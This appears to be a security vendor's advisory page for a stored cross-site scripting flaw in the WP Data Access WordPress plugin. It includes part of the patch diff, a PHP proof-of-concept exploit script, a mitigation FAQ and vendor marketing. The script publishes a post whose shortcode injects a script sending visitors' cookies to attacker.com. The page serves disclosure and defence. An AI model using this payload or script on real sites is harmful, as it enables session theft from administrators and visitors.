-				<a href="https://wpdataaccess.com/docs/data-designer/data-designer-getting-started/" target="_blank" class="wpda_tooltip" title="Plugin Help - opens in a new tab or window">
+				<a href="https://docs.legacy.wpdataaccess.com/docs/data-designer-getting-started/" target="_blank" class="wpda_tooltip" title="Plugin Help - opens in a new tab or window">
 					<span class="dashicons dashicons-editor-help" style="text-decoration:none;vertical-align:top;font-size:30px;">
 					</span>
 				</a>
@@ -1111,7 +1111,7 @@
 		<div class="wrap">
 			<h1 class="wp-heading-inline">
 				<span>Data Tables</span>
-				<a href="https://wpdataaccess.com/docs/data-tables/data-tables-getting-started/" target="_blank" class="wpda_tooltip" title="Plugin Help - opens in a new tab or window">
+				<a href="https://docs.legacy.wpdataaccess.com/docs/data-tables-getting-started/" target="_blank" class="wpda_tooltip" title="Plugin Help - opens in a new tab or window">
 					<span class="dashicons dashicons-editor-help" style="text-decoration:none;vertical-align:top;font-size:30px;">
 					</span>
 				</a>
--- a/wp-data-access/includes/class-wp-data-access.php
+++ b/wp-data-access/includes/class-wp-data-access.php
@@ -374,7 +374,7 @@
             'wpda_set_hard_row_count',
             function ( $dbs, $tbl ) {
                 // Only admins and super admins.
-                if ( current_user_can( 'manage_options' ) || current_user_can( 'manage_sites' ) ) {
+                if ( WPDA::current_user_is_admin() ) {
                     // Get actual row count.
                     $count = WPDataAccessAPIWPDA_Actions::get_row_count( $dbs, $tbl );
                     // Get table settings.
--- a/wp-data-access/wp-data-access.php
+++ b/wp-data-access/wp-data-access.php
@@ -4,7 +4,7 @@
  * Plugin Name:       WP Data Access
  * Plugin URI:        https://wpdataaccess.com/
  * Description:       A powerful data-driven App Builder with an intuitive Table Builder, a highly customizable Form Builder and interactive Chart support in 35 languages
- * Version:           5.5.63
+ * Version:           5.5.64
  * Author:            Passionate Programmers B.V.
  * Author URI:        https://wpdataaccess.com/
  * Text Domain:       wp-data-access

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-0557 - WP Data Access <= 5.5.63 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'wpda_app' Shortcode

<?php

$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/post.php';
$username = 'contributor_user';
$password = 'contributor_password';

// Payload to steal admin cookies via XSS
$malicious_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>';

// Create a post with malicious wpda_app shortcode
$post_data = [
    'post_title' => 'Vulnerable Post',
    'post_content' => '[wpda_app app_id="1" xss="' . $malicious_payload . '"]',
    'post_status' => 'publish',
    'post_type' => 'post'
];

// Initialize cURL session for login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// First, get login page to obtain nonce
curl_setopt($ch, CURLOPT_URL, 'http://vulnerable-wordpress-site.com/wp-login.php');
$login_page = curl_exec($ch);

// Extract login nonce (simplified - real implementation would parse HTML)
// WordPress uses 'log' and 'pwd' parameters for login

// Perform login
$login_params = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => 'http://vulnerable-wordpress-site.com/wp-admin/',
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, 'http://vulnerable-wordpress-site.com/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_params));
$login_response = curl_exec($ch);

// Check if login succeeded by accessing admin page
curl_setopt($ch, CURLOPT_URL, 'http://vulnerable-wordpress-site.com/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_POST, false);
$admin_page = curl_exec($ch);

if (strpos($admin_page, 'Dashboard') === false) {
    echo "Login failed. Check credentials.n";
    exit;
}

echo "Logged in successfully as contributor.n";

// Now create the malicious post
curl_setopt($ch, CURLOPT_URL, 'http://vulnerable-wordpress-site.com/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_POST, true);

// Get nonce for post creation (simplified)
$post_params = array_merge($post_data, [
    '_wpnonce' => 'extracted_nonce_here', // Would need to extract from page
    '_wp_http_referer' => '/wp-admin/post-new.php',
    'publish' => 'Publish'
]);

curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_params));
$post_response = curl_exec($ch);

if (strpos($post_response, 'Post published') !== false || strpos($post_response, 'Post updated') !== false) {
    echo "Malicious post created successfully with XSS payload.n";
    echo "When any user views this post, their cookies will be sent to attacker.com.n";
} else {
    echo "Failed to create post.n";
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-0557?
Overview of the vulnerability
CVE-2026-0557 is a stored cross-site scripting (XSS) vulnerability in the WP Data Access plugin for WordPress. It allows authenticated users with contributor privileges and higher to inject malicious scripts via the ‘wpda_app’ shortcode.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient sanitization and escaping of user-supplied attributes in the ‘wpda_app’ shortcode. An attacker can craft a shortcode with malicious JavaScript that executes when the page is viewed by other users.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using WP Data Access version 5.5.63 or earlier is affected. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Identifying vulnerable versions
To check if your site is vulnerable, verify the version of the WP Data Access plugin installed. If it is version 5.5.63 or earlier, your site is at risk and should be updated immediately.
How can I fix this vulnerability?
Steps to mitigate the issue
To fix this vulnerability, update the WP Data Access plugin to version 5.5.64 or later, where the issue has been patched. Regularly check for updates to ensure continued security.
What does the CVSS score of 6.4 mean?
Understanding risk levels
A CVSS score of 6.4 indicates a medium severity vulnerability. This means it requires authenticated access to exploit but can lead to significant consequences, including the potential for session hijacking and content manipulation.
What are the practical risks of this vulnerability?
Potential impacts on users
If exploited, this vulnerability allows attackers to inject scripts that can steal cookies, perform actions on behalf of users, deface content, or distribute malware. The stored nature of the XSS means it affects all users viewing the compromised page.
What is a proof of concept (PoC) in this context?
Demonstrating the vulnerability
A proof of concept (PoC) is a demonstration that shows how the vulnerability can be exploited. The provided PoC illustrates how an attacker can create a post with a malicious shortcode to execute JavaScript in the browsers of users who view the post.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the WP Data Access plugin until it can be updated. Additionally, restrict contributor access or monitor user activities closely to prevent exploitation.
How can I protect my WordPress site from future vulnerabilities?
Best practices for security
To protect your site, regularly update all plugins and themes, use security plugins to monitor for vulnerabilities, and implement strong user access controls. Conduct periodic security audits to identify and remediate potential risks.
Is there a way to report vulnerabilities in plugins?
Responsible disclosure
Yes, if you discover a vulnerability in a plugin, you can report it to the plugin developers through their official support channels or security reporting mechanisms. Responsible disclosure helps improve the security of the WordPress ecosystem.
What are the implications of stored XSS vulnerabilities?
Understanding stored XSS risks
Stored XSS vulnerabilities can have severe implications as the malicious script is saved on the server and executed whenever the affected page is accessed. This can lead to widespread compromise of user sessions and sensitive data exposure.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations